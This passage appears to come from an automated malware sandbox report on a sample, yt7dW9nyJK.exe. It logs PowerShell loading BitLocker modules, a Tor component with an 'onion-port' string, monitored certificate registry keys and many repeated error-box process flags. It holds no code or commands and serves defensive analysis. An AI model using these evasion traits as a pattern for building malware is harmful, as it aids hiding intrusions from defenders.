Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

May use the Tor software to hide its network traffic

Source: tor-real.exe, 00000019.00000000.2396954468.00000000003B6000.00000002.00000001.01000000.0000000B.sdmp

Binary or memory string: onion-port

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
